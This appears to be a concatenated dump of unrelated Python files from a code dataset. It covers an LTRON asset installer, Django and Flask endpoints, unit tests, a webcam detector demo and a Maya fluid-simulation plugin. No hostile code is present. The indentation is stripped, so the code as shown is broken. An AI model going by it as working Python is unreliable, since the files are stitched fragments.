search = os.path.join(opt.input_path, seq, 'matches', "*---*."+opt.prev_output_suffix+'.bin')
listing = glob.glob(search)
pairs = [os.path.basename(path[:-5-len(opt.prev_output_suffix)]).split("---") for path in listing]
for pair in tqdm(pairs):
img1_name, img2_name = pair[0], pair[1]
dump_match(matcher, img1_name, img2_name, os.path.join(opt.input_path, seq), opt.input_suffix, opt.output_suffix)
| nilq/baby-python | python |
class WrongState(Exception):
def __init__(self, value, sessionState=None):
self.value = value
self.state = sessionState
def __str__(self):
return repr(self.value)
| nilq/baby-python | python |
from django.shortcuts import render
from .models import Chat
from .serializers import ChatSerializer
from rest_framework import viewsets
# Create your views here.
class ChatViewSet(viewsets.ModelViewSet):
serializer_class = ChatSerializer
queryset = Chat.objects.all() | nilq/baby-python | python |
import os
import shutil
import requests
import zipfile
import bz2
import tarfile
from splendor.home import get_splendor_home
from splendor.assets import install_assets
from splendor.download import download, agree_to_zip_licenses
import ltron.settings as settings
from ltron.home import get_ltron_home, make_ltron_home
from ltron.license import ldcad_license_text
ltron_home = get_ltron_home()
def install_ldraw(overwrite=False):
print('='*80)
print('Installing LDraw')
make_ltron_home()
print('-'*80)
complete_zip_path = os.path.join(ltron_home, 'complete.zip')
downloaded_path = download(
settings.urls['ldraw'],
complete_zip_path,
overwrite=overwrite,
)
print('-'*80)
print('Checking for Licenses')
if agree_to_zip_licenses(complete_zip_path):
print('Extracting Contents To: %s'%ltron_home)
with zipfile.ZipFile(complete_zip_path, 'r') as z:
z.extractall(ltron_home)
else:
print('Must agree to all licensing. Aborting LDraw install.')
def ldcad_license_agreement():
print('LDCad is a necessary component of LTRON '
'and is provided under the following license:')
print(ldcad_license_text)
print('Agree? (y/n)')
yn = input()
return yn in 'yY'
def install_ldcad(overwrite=True):
print('='*80)
print('Installing LDCad')
make_ltron_home()
print('-'*80)
# download
ldcad_url = settings.urls['ldcad']
ldcad_bz2_filename = ldcad_url.split('/')[-1]
ldcad_bz2_path = os.path.join(ltron_home, ldcad_bz2_filename)
download(ldcad_url, ldcad_bz2_path, overwrite=overwrite)
print('-'*80)
if not ldcad_license_agreement():
print('Must agree to all licensing. Aborting LDCad intall.')
return False
# unbz2
ldcad_tar_path = ldcad_bz2_path.replace('.bz2', '')
print('-'*80)
print('Extracting bz2 archive to: %s'%ldcad_tar_path)
with open(ldcad_bz2_path, 'rb') as f_in:
data = bz2.decompress(f_in.read())
with open(ldcad_tar_path, 'wb') as f_out:
f_out.write(data)
# untar
ldcad_path = ldcad_tar_path.replace('.tar', '')
print('-'*80)
print('Extracting tar archive to: %s'%ldcad_path)
with tarfile.open(ldcad_tar_path, 'r:') as f:
f.extractall(ltron_home)
# unzip shadow
print('-'*80)
print('Unzipping shadow')
shadow_seed_path = os.path.join(ldcad_path, 'seeds', 'shadow.sf')
ldcad_shadow_path = os.path.join(ldcad_path, 'shadow')
if not os.path.exists(ldcad_shadow_path):
os.makedirs(ldcad_shadow_path)
with zipfile.ZipFile(shadow_seed_path, 'r') as z:
z.extractall(ldcad_shadow_path)
# unzip offLib
print('-'*80)
print('Unzipping offLibShadow')
ldcad_offlibshadow_csl_path = os.path.join(
ldcad_shadow_path, 'offLib', 'offLibShadow.csl')
ldcad_offlibshadow_path = os.path.join(
ldcad_shadow_path, 'offLib', 'offLibShadow')
if not os.path.exists(ldcad_offlibshadow_path):
os.makedirs(ldcad_offlibshadow_path)
with zipfile.ZipFile(ldcad_offlibshadow_csl_path, 'r') as z:
z.extractall(ldcad_offlibshadow_path)
def install_collection(name, overwrite=False):
print('='*80)
print('Installing %s Data Collection'%name)
print('-'*80)
zip_path = os.path.join(settings.paths['collections'], '%s.zip'%name)
download(settings.urls[name], zip_path, overwrite=overwrite)
print('-'*80)
print('Extracting collection %s'%name)
extract_path = os.path.join(settings.paths['collections'], name)
if not os.path.exists(extract_path) or overwrite:
with zipfile.ZipFile(zip_path, 'r') as z:
z.extractall(settings.paths['collections'])
else:
print('Already extracted.')
def install_splendor_meshes(resolution, overwrite=False):
print('='*80)
print('Installing Splendor Meshes (%s)'%resolution)
print('-'*80)
asset_name = 'ltron_assets_%s'%resolution
install_assets(settings.urls[asset_name], asset_name, overwrite=overwrite)
splendor_home = get_splendor_home()
resolution_path = os.path.join(splendor_home, asset_name)
resolution_cfg_path = resolution_path + '.cfg'
generic_cfg_path = os.path.join(splendor_home, 'ltron_assets.cfg')
if os.path.exists(generic_cfg_path):
os.unlink(generic_cfg_path)
os.symlink(resolution_cfg_path, generic_cfg_path)
#generic_path = os.path.join(splendor_home, 'ltron_assets')
#if os.path.exists(generic_path):
# os.unlink(generic_path)
#os.symlink(resolution_path, generic_path)
default_settings_cfg = '''
[DEFAULT]
datasets = {HOME}/datasets
collections = {HOME}/collections
[paths]
ldraw = {HOME}/ldraw
ldcad = {HOME}/LDCad-1-6d-Linux
shadow = %(ldcad)s/shadow
shadow_ldraw = %(shadow)s/offLib/offLibShadow
[datasets]
random_six = %(collections)s/random_six/random_six.json
#snap_one = %(collections)s/snap_one/snap_one.json
#snap_one_frames = %(collections)s/snap_one/snap_one_frames.json
#snap_four = %(collections)s/snap_four/snap_four.json
#snap_four_frames = %(collections)s/snap_four/snap_four_frames.json
#conditional_snap_two = %(collections)s/conditional_snap_two/conditional_snap_two.json
#conditional_snap_two_frames = %(collections)s/conditional_snap_two/conditional_snap_two_frames.json
[collections]
omr = %(collections)s/omr
random_six = %(collections)s/random_six
#snap_one = %(collections)s/snap_one
#snap_four = %(collections)s/snap_four
#conditional_snap_two = %(collections)s/conditional_snap_two
[urls]
ltron = https://github.com/aaronwalsman/ltron
ldraw = http://www.ldraw.org/library/updates/complete.zip
ldcad = http://www.melkert.net/action/download/LDCad-1-6d-Linux.tar.bz2
ldcad_home = http://www.melkert.net/LDCad
omr_ldraw = https://omr.ldraw.org
omr = https://drive.google.com/uc?id=1nr3uut3QK2qCzRm3VjYKc4HNgsum8hLf
random_six = https://drive.google.com/uc?id=11K6Zu59aU7EXRcsY_ALcOJG1S2aXcVXz
ltron_assets_low = https://drive.google.com/uc?id=11p_vyeL_B_BK7gupI8_JvGGbffJ2kXiG
ltron_assets_high = https://drive.google.com/uc?id=1wIw-0YXx9QkQ9Kjpcvv5XsZFqdZrGj6U
'''
def make_settings_cfg(overwrite=False):
settings_path = os.path.join(ltron_home, 'settings.cfg')
if not os.path.exists(settings_path) or overwrite:
print('Writing default settings file to: %s'%settings_path)
with open(settings_path, 'w') as f:
f.write(default_settings_cfg)
else:
print('Settings file already exists: %s'%settings_path)
| nilq/baby-python | python |
# 准备U-net训练数据
from scipy import ndimage as ndi
import numpy
import cv2
MASK_MARGIN = 5
def make_mask(v_center, v_diam, width, height):
mask = numpy.zeros([height, width])
v_xmin = numpy.max([0, int(v_center[0] - v_diam) - MASK_MARGIN])
v_xmax = numpy.min([width - 1, int(v_center[0] + v_diam) + MASK_MARGIN])
v_ymin = numpy.max([0, int(v_center[1] - v_diam) - MASK_MARGIN])
v_ymax = numpy.min([height - 1, int(v_center[1] + v_diam) + MASK_MARGIN])
v_xrange = range(v_xmin, v_xmax + 1)
v_yrange = range(v_ymin, v_ymax + 1)
for v_x in v_xrange:
for v_y in v_yrange:
p_x = v_x
p_y = v_y
if numpy.linalg.norm(numpy.array([v_center[0], v_center[1]])\
- numpy.array([p_x, p_y]))<= v_diam * 2:
mask[p_y, p_x] = 1.0 # 设置节点区域的像素值为1
return mask
if __name__ == '__main__':
imagePath = './data/chaper3_img_01.png'
# 读取dicom文件的元数据(dicom tags)
img = cv2.imread(imagePath, cv2.IMREAD_GRAYSCALE)
print('before resize: ', img.shape)
img_X = ndi.interpolation.zoom(img, [320/512, 320/512], mode='nearest') # 被缩放成了320
print('after resize: ', img_X.shape)
# cv2.imwrite('./temp_dir/chapter3_img_XX.png', img_X)
img_Y = make_mask((217, 160), 3, 320, 320) # 结节信息由标注文件给出
img_Y[img_Y < 0.5] = 0
img_Y[img_Y > 0.5] = 255
nodule_mask = img_Y.astype('uint8')
# cv2.imwrite('./temp_dir/chapter3_img_Y.png', img_Y)
| nilq/baby-python | python |
import numpy as np
import pymarketstore as pymkts
try:
from unittest.mock import patch
except ImportError:
from mock import patch
from pymarketstore.proto import marketstore_pb2_grpc
from pymarketstore.proto.marketstore_pb2 import MultiQueryRequest, QueryRequest
def test_grpc_client_init():
c = pymkts.GRPCClient("127.0.0.1:5995")
assert c.endpoint == "127.0.0.1:5995"
assert isinstance(c.stub, marketstore_pb2_grpc.MarketstoreStub)
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_query(stub):
# --- given ---
c = pymkts.GRPCClient()
p = pymkts.Params('BTC', '1Min', 'OHLCV')
# --- when ---
c.query(p)
# --- then ---
assert c.stub.Query.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_create(stub):
# --- given ---
c = pymkts.GRPCClient()
dtype = [('Epoch', 'i8'), ('Bid', 'f4'), ('Ask', 'f4')]
tbk = 'TEST/1Min/TICK'
# --- when ---
c.create(tbk=tbk, dtype=dtype, isvariablelength=False)
# --- then ---
assert c.stub.Create.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_write(stub):
# --- given ---
c = pymkts.GRPCClient()
data = np.array([(1, 0)], dtype=[('Epoch', 'i8'), ('Ask', 'f4')])
tbk = 'TEST/1Min/TICK'
# --- when ---
c.write(data, tbk)
# --- then ---
assert c.stub.Write.called == 1
def test_build_query():
# --- given ---
c = pymkts.GRPCClient(endpoint="127.0.0.1:5995")
p = pymkts.Params('TSLA', '1Min', 'OHLCV', 1500000000, 4294967296)
# --- when ---
query = c.build_query([p])
# --- then ---
assert query == MultiQueryRequest(
requests=[QueryRequest(destination="TSLA/1Min/OHLCV", epoch_start=1500000000, epoch_end=4294967296)])
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_list_symbols(stub):
# --- given ---
c = pymkts.GRPCClient()
# --- when ---
c.list_symbols()
# --- then ---
assert c.stub.ListSymbols.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_destroy(stub):
# --- given ---
c = pymkts.GRPCClient()
tbk = 'TEST/1Min/TICK'
# --- when ---
c.destroy(tbk)
# --- then ---
assert c.stub.Destroy.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_server_version(stub):
# --- given ---
c = pymkts.GRPCClient()
# --- when ---
c.server_version()
# --- then ---
assert c.stub.ServerVersion.called == 1
| nilq/baby-python | python |
import unittest
import pathlib
import wellcad.com
from ._extra_asserts import ExtraAsserts
from ._sample_path import SamplePath
class TestLithoPattern(unittest.TestCase, ExtraAsserts, SamplePath):
@classmethod
def setUpClass(cls):
cls.app = wellcad.com.Application()
cls.sample_path = cls._find_sample_path()
cls.borehole = cls.app.open_borehole(str(cls.sample_path / "Core Description.wcl"))
cls.litho_log = cls.borehole.get_log("lithology")
cls.dict = cls.litho_log.litho_dictionary
cls.pattern = cls.dict.litho_pattern(0)
@classmethod
def tearDownClass(cls):
cls.app.quit(False)
def test_code(self):
self.assertAttrEqual(self.pattern, "code", '#5')
def test_description(self):
self.assertAttrEqual(self.pattern, "description", 'Sand Color')
def test_width(self):
self.assertAlmostEqual(self.pattern.width, 20, 3)
def test_height(self):
self.assertAlmostEqual(self.pattern.height, 20, 3)
def test_repeatable(self):
self.assertEqual(self.pattern.repeatable, True)
if __name__ == '__main__':
unittest.main()
| nilq/baby-python | python |
import os
from flask_apispec import MethodResource
from flask_apispec import doc
from flask_jwt_extended import jwt_required
from flask_restful import Resource
from decorator.catch_exception import catch_exception
from decorator.log_request import log_request
from decorator.verify_admin_access import verify_admin_access
class GetMailContent(MethodResource, Resource):
def __init__(self, db):
self.db = db
@log_request
@doc(tags=['mail'],
description='Get the HTML content of the specified mail template name (new_account or reset_password)',
responses={
"200": {},
"404": {"description": "This mail template does not exist"},
})
@jwt_required
@verify_admin_access
@catch_exception
def get(self, name):
if name in ["new_account", "reset_password"]:
with open(os.path.join(os.path.dirname(__file__), "..", "..", "template", f"{name}.html"), "r") as f:
data = f.read()
else:
return "", "404 This mail template does not exist"
return data, "200 "
| nilq/baby-python | python |
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import sys
from struct import unpack
INPUT_FILENAME = sys.argv[1]
OUTPUT_FILENAME = sys.argv[2]
with open(INPUT_FILENAME, "rb") as f:
data = f.read()
words = len(data) // 4
if len(data) % 4 != 0:
print("Warning: input length not word aligned")
str = "<L%i" % words
print("Data length %i" % len(data))
data = unpack("<%iL" % words, data)
str = "analyzer = (\n "
count = 0
for val in data:
if count % 8 == 7:
str += "0x{:08x},\n ".format(val)
else:
str += "0x{:08x}, ".format(val)
count += 1
str += "\n )"
data = str
with open(OUTPUT_FILENAME, "w") as f:
f.write(data)
| nilq/baby-python | python |
#!/usr/bin/env python
import cv2
from argparse import ArgumentParser
from time import time
from core.detectors import CornerNet_Saccade, CornerNet_Squeeze
from core.vis_utils import draw_bboxes
def main(args):
cam = cv2.VideoCapture(args.device)
if args.codec == 'YUY2':
cam.set(cv2.CAP_PROP_FOURCC, 844715353.0)
elif args.codec == 'MJPG':
cam.set(cv2.CAP_PROP_FOURCC, 0x47504A4D)
else:
print('use default video codec.')
if args.resolution:
cam.set(cv2.CAP_PROP_FRAME_WIDTH, args.resolution[0])
cam.set(cv2.CAP_PROP_FRAME_HEIGHT,args.resolution[1])
detector = CornerNet_Squeeze(model_name=args.model) if args.model else CornerNet_Squeeze()
frame_count = 0
init_time = time()
tic = time()
try:
while True:
# Capture frame-by-frame
if cam.grab():
_, frame = cam.retrieve()
bboxes = detector(frame)
frame = draw_bboxes(frame, bboxes)
toc = time()
frame_count += 1
else:
continue
# Calculate fps
if toc - init_time > 3:
fps = frame_count / (toc - tic)
print('{:.2f}: {} x {} @ {:5.1f}'.format(time(), frame.shape[1], frame.shape[0], fps))
if toc -tic > 3:
tic = time()
frame_count = 0
# Show the resulting frame
if args.visual:
frame = cv2.resize(frame, (0, 0), fx=args.scale, fy=args.scale)
cv2.imshow('/dev/video{}'.format(args.device), frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
except KeyboardInterrupt:
print('\nKeyboardInterrupt')
pass
# When everything done, release the capture
cam.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-d', '--device', help='device number: /dev/video#', type=int, default=0)
parser.add_argument('-c', '--codec', help='video codec: MJPG/YUY2')
parser.add_argument('-v', '--visual', action='store_true', dest='visual', help='Show image frame')
parser.add_argument('-r', '--resolution', nargs='+', type=float, help='resolution: w, h')
parser.add_argument('-s', '--scale', type=float, help='output frame scale: [0.25]', default=0.25)
parser.add_argument('-m', '--model', type=str, help='model name')
args = parser.parse_args()
main(args)
| nilq/baby-python | python |
import maya.cmds as cmds
import maya.api.OpenMaya as apiOpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import json
import os
import math
import sys
import re
import struct
from collections import OrderedDict
from copy import deepcopy
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
######################################################
# PluginFunctions
######################################################
class PluginFunctions():
######################################################
# getAllNodesOfType
######################################################
@staticmethod
def getAllNodesOfType(typeId):
list = cmds.ls( type='transform', long=True )
result = []
for node in list:
# find type attribute
sphAttr = cmds.listAttr(node, string="SPH_Type")
if sphAttr != None:
sphtype = cmds.getAttr(node + ".SPH_Type")
if typeId == sphtype:
result.append(node)
return result
######################################################
# getShape
######################################################
@staticmethod
def getShape(nodeName):
return cmds.listRelatives(nodeName, shapes=True, type="shape")
######################################################
# get quaternion of a transform node
######################################################
@staticmethod
def getQuaternion(node):
sel_list = apiOpenMaya.MSelectionList()
sel_list.add(node)
obj = sel_list.getDependNode(0)
xform = apiOpenMaya.MFnTransform(obj)
quat = xform.rotation(asQuaternion=True)
quat.normalizeIt()
return quat
######################################################
# get axis,angle of a transform node
######################################################
@staticmethod
def getAxisAngle(node):
sel_list = apiOpenMaya.MSelectionList()
sel_list.add(node)
obj = sel_list.getDependNode(0)
xform = apiOpenMaya.MFnTransform(obj)
quat = xform.rotation(asQuaternion=True)
quat.normalizeIt()
aa = quat.asAxisAngle()
return ([aa[0][0], aa[0][1], aa[0][2]], aa[1])
@staticmethod
def createFloatAttr(longName, shortName, defaultValue, softMin, softMax, minValue=0, maxValue=1000000):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.kFloat, defaultValue )
nAttr.setStorable(1)
nAttr.setMin(minValue)
nAttr.setMax(maxValue)
nAttr.setSoftMin(softMin)
nAttr.setSoftMax(softMax)
return newAttr
@staticmethod
def createIntAttr(longName, shortName, defaultValue, softMin, softMax, minValue=0, maxValue=1000000):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.kInt, defaultValue )
nAttr.setStorable(1)
nAttr.setMin(minValue)
nAttr.setMax(maxValue)
nAttr.setSoftMin(softMin)
nAttr.setSoftMax(softMax)
return newAttr
@staticmethod
def createBoolAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.kBoolean, defaultValue )
nAttr.setStorable(1)
return newAttr
@staticmethod
def createVec3Attr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.k3Float )
nAttr.setDefault(defaultValue[0], defaultValue[1], defaultValue[2])
nAttr.setStorable(1)
return newAttr
@staticmethod
def createColorAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.createColor( longName, shortName )
nAttr.setDefault(defaultValue[0], defaultValue[1], defaultValue[2])
nAttr.setStorable(1)
return newAttr
@staticmethod
def createVec3iAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.k3Int )
nAttr.setDefault(defaultValue[0], defaultValue[1], defaultValue[2])
nAttr.setStorable(1)
return newAttr
@staticmethod
def createEnumAttr(longName, shortName, defaultValue, enumList):
eAttr = OpenMaya.MFnEnumAttribute()
newAttr = eAttr.create( longName, shortName, defaultValue)
i=0
for item in enumList:
eAttr.addField(item, i)
i+=1
eAttr.setStorable(1)
return newAttr
@staticmethod
def createStringAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnTypedAttribute()
sData = OpenMaya.MFnStringData()
default = sData.create(defaultValue)
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnData.kString, default )
nAttr.setStorable(1)
return newAttr
######################################################
# createBoolParam
######################################################
@staticmethod
def createBoolParam(name, label, description, defaultValue):
param = {
"type": "bool",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createFloatParam
######################################################
@staticmethod
def createFloatParam(name, label, description, defaultValue, minValue, maxValue, fieldMin=0, fieldMax=1000000):
param = {
"type": "float",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"min": minValue,
"max": maxValue,
"fieldMin": fieldMin,
"fieldMax": fieldMax,
"ctrlId": None
}
return param
######################################################
# createVec3Param
######################################################
@staticmethod
def createVec3Param(name, label, description, defaultValue):
param = {
"type": "vec3",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createColorParam
######################################################
@staticmethod
def createColorParam(name, label, description, defaultValue):
param = {
"type": "color",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createVec3iParam
######################################################
@staticmethod
def createVec3iParam(name, label, description, defaultValue):
param = {
"type": "vec3i",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createIntParam
######################################################
@staticmethod
def createIntParam(name, label, description, defaultValue, minValue, maxValue, fieldMin=0, fieldMax=1000000):
param = {
"type": "int",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"min": minValue,
"max": maxValue,
"fieldMin": fieldMin,
"fieldMax": fieldMax,
"ctrlId": None
}
return param
######################################################
# createStringParam
######################################################
@staticmethod
def createStringParam(name, label, description, defaultValue):
param = {
"type": "string",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createEnumParam
######################################################
@staticmethod
def createEnumParam(name, label, description, defaultValue, enumList):
param = {
"type": "enum",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"enumList": enumList,
"ctrlId": None
}
return param
######################################################
# getSelectedTransforms
# get all selected transform nodes recursively
######################################################
@staticmethod
def getSelectedTransforms():
list = cmds.ls( selection=True, type='transform', long=True )
transformNodes = []
for item in list:
transformNodes.append(item)
children = cmds.listRelatives(item, ad=True, type="transform")
if children == None:
continue
for child in children:
transformNodes.append(child)
return transformNodes
######################################################
# createCircularEmitter
######################################################
class createCircularEmitterCmd(OpenMayaMPx.MPxCommand):
s_name = "createCircularEmitter"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return createCircularEmitterCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
self.cyl = cmds.polyCylinder(name="CircularEmitter", r=1, h=0.2, sx=20, sy=1, sz=1, ax=[1,0,0], rcp=0, cuv=3, ch=1)
cmds.delete(ch=True)
node = self.cyl[0]
cmds.delete(node + ".f[40:59]")
cmds.scale(0.5, 0.5, 0.5, self.cyl[0])
# set type
cmds.addAttr(node, longName="SPH_Type", niceName="type",dt="string", hidden=True)
cmds.setAttr((node + '.SPH_Type'), "CircularEmitter", type="string")
# velocity
cmds.addAttr(node, longName="SPH_velocity", niceName="velocity", at="float");
cmds.setAttr((node + '.SPH_velocity'), 1.0)
# start time
cmds.addAttr(node, longName="SPH_startTime", niceName="start time", at="float");
cmds.setAttr((node + '.SPH_startTime'), 0.0)
# velocity
cmds.addAttr(node, longName="SPH_endTime", niceName="end time", at="float");
cmds.setAttr((node + '.SPH_endTime'), 100000.0)
# fluid id
cmds.addAttr(node, longName="SPH_fluidId", niceName="Fluid id", dt="string")
cmds.setAttr((node + '.SPH_fluidId'), "Fluid", type="string")
def undoIt(self):
pass
def isUndoable(self):
return True
######################################################
# RectangularEmitter
######################################################
class createRectangularEmitterCmd(OpenMayaMPx.MPxCommand):
s_name = "createRectangularEmitter"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return createRectangularEmitterCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
self.cube = cmds.polyCube(name="RectangularEmitter", w=0.2, h=1, d=1, sx=1, sy=1, sz=1, ch=1)
cmds.delete(ch=True)
node = self.cube[0]
cmds.delete(node + ".f[4]")
# set type
cmds.addAttr(node, longName="SPH_Type", niceName="type",dt="string", hidden=True)
cmds.setAttr((node + '.SPH_Type'), "RectangularEmitter", type="string")
# velocity
cmds.addAttr(node, longName="SPH_velocity", niceName="velocity", at="float");
cmds.setAttr((node + '.SPH_velocity'), 1.0)
# start time
cmds.addAttr(node, longName="SPH_startTime", niceName="start time", at="float");
cmds.setAttr((node + '.SPH_startTime'), 0.0)
# velocity
cmds.addAttr(node, longName="SPH_endTime", niceName="end time", at="float");
cmds.setAttr((node + '.SPH_endTime'), 100000.0)
# fluid id
cmds.addAttr(node, longName="SPH_fluidId", niceName="Fluid id", dt="string")
cmds.setAttr((node + '.SPH_fluidId'), "Fluid", type="string")
def undoIt(self):
pass
def isUndoable(self):
return True
######################################################
# AnimationField
######################################################
class createAnimationFieldCmd(OpenMayaMPx.MPxCommand):
s_name = "createAnimationField"
s_shortTypeFlag = '-s'
s_longTypeFlag = '-shape'
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def syntaxCreator():
syntax = OpenMaya.MSyntax()
syntax.addFlag( createAnimationFieldCmd.s_shortTypeFlag, createAnimationFieldCmd.s_longTypeFlag, OpenMaya.MSyntax.kLong )
return syntax
@staticmethod
def creator():
return createAnimationFieldCmd()
def doIt(self, args):
argData = OpenMaya.MArgParser( self.syntax(), args )
self.shapeType = 0
if argData.isFlagSet( createAnimationFieldCmd.s_shortTypeFlag ):
self.shapeType = argData.flagArgumentInt(createAnimationFieldCmd.s_shortTypeFlag, 0)
self.redoIt()
def redoIt(self):
poly = ""
if self.shapeType == 1:
poly = cmds.polySphere(name="AnimationField", r=1, sx=20, sy=20, ax=[0,1,0], cuv=2, ch=1)
cmds.expression(s=poly[0] + ".scaleY=" + poly[0] + ".scaleZ=" + poly[0] + ".scaleX;", o=poly[0])
elif self.shapeType == 2:
poly = cmds.polyCylinder(name="AnimationField", r=1, h=1, sx=20, sy=1, ax=[1,0,0], cuv=3, rcp=0, ch=1)
cmds.expression(s=poly[0] + ".scaleZ=" + poly[0] + ".scaleY;", o=poly[0])
else:
poly = cmds.polyCube(name="AnimationField", w=1, h=1, d=1, sx=1, sy=1, sz=1, ch=1)
cmds.delete(ch=True)
node = poly[0]
# set type
cmds.addAttr(node, longName="SPH_shapeType", niceName="shape type", at="long", hidden=True)
cmds.setAttr((node + '.SPH_shapeType'), self.shapeType)
# set type
cmds.addAttr(node, longName="SPH_Type", niceName="type",dt="string", hidden=True)
cmds.setAttr((node + '.SPH_Type'), "AnimationField", type="string")
# set particle field
cmds.addAttr(node, longName="SPH_particleField", niceName="paricle field",dt="string")
cmds.setAttr((node + '.SPH_particleField'), "velocity", type="string")
# set expression
cmds.addAttr(node, longName="SPH_expressionX", niceName="expression - x",dt="string")
cmds.setAttr((node + '.SPH_expressionX'), "", type="string")
cmds.addAttr(node, longName="SPH_expressionY", niceName="expression - y",dt="string")
cmds.setAttr((node + '.SPH_expressionY'), "", type="string")
cmds.addAttr(node, longName="SPH_expressionZ", niceName="expression - z",dt="string")
cmds.setAttr((node + '.SPH_expressionZ'), "", type="string")
def undoIt(self):
pass
def isUndoable(self):
return True
######################################################
# convertToFluid
#
# Converts a list of transform nodes to fluid models.
# Only nodes with a shape are converted.
######################################################
class convertToFluidCmd(OpenMayaMPx.MPxCommand):
s_name = "convertToFluid"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return convertToFluidCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
nodes = PluginFunctions.getSelectedTransforms()
self.convertToFluid(nodes)
def convertToFluid(self, nodes):
for node in nodes:
shapeNode = PluginFunctions.getShape(node)
if shapeNode != None:
lst = cmds.listRelatives(node, children=True, type='SPHFluidNode' )
if (lst == None):
cmds.createNode("SPHFluidNode", name="SPH_Fluid", parent=node)
else:
print("The node " + node + " is already an SPH fluid.")
######################################################
# convertToRigidBody
#
# Converts a list of transform nodes to rigid bodies.
# Only nodes with a shape are converted.
######################################################
class convertToRigidBodiesCmd(OpenMayaMPx.MPxCommand):
s_name = "convertToRigidBodies"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return convertToRigidBodiesCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
nodes = PluginFunctions.getSelectedTransforms()
self.convertToRigidBody(nodes)
def convertToRigidBody(self, nodes):
for node in nodes:
shapeNode = PluginFunctions.getShape(node)
if shapeNode != None:
lst = cmds.listRelatives(node, children=True, type='SPHRigidBodyNode' )
if (lst == None):
cmds.createNode("SPHRigidBodyNode", name="SPH_Rigid_Body", parent=node)
else:
print("The node " + node + " is already an SPH rigid body.")
######################################################
# saveModel
######################################################
class saveModelCmd(OpenMayaMPx.MPxCommand):
s_name = "saveModel"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return saveModelCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
sphConfigList = cmds.ls( type='SPHConfigurationNode', long=True )
if len(sphConfigList) == 0:
cmds.warning("Not saved since no SPH configuration node was found.")
return
if not cmds.pluginInfo("objExport", query=True, loaded=True):
cmds.loadPlugin("objExport")
fileName = cmds.fileDialog2(ff="*.json", fm=0, dir="")
scenePath = os.path.dirname(fileName[0])
scene=self.generateScene(scenePath)
if scene == None:
return
f = open(fileName[0], 'w')
json_str = json.dumps(scene, sort_keys=True,indent=4, separators=(',', ': '))
f.write(json_str)
f.close()
def isUndoable(self):
return False
######################################################
# openFluidIdDialog
######################################################
def openFluidIdDialog(self):
sphConfigList = cmds.ls( type='SPHConfigurationNode', long=False )
cmds.columnLayout( adjustableColumn=True, columnOffset=["both", 10], rowSpacing=10, columnAlign="center" )
cmds.textScrollList("SPHFluidIdList", numberOfRows=8, allowMultiSelection=False,
append=sphConfigList,
selectItem=sphConfigList[0], showIndexedItem=1)
cmds.rowLayout(numberOfColumns=2)
cmds.button("Ok", c='cmds.layoutDialog( dismiss="Ok " + cmds.textScrollList("SPHFluidIdList",q=True,selectItem=True)[0] )' )
cmds.button("Cancel", c='cmds.layoutDialog( dismiss="Cancel" )')
######################################################
# generate scene
######################################################
def generateScene(self, scenePath):
scene = OrderedDict()
scene['FluidModels'] = []
scene['RigidBodies'] = []
scene['Emitters'] = []
scene['AnimationFields'] = []
scene['Materials'] = []
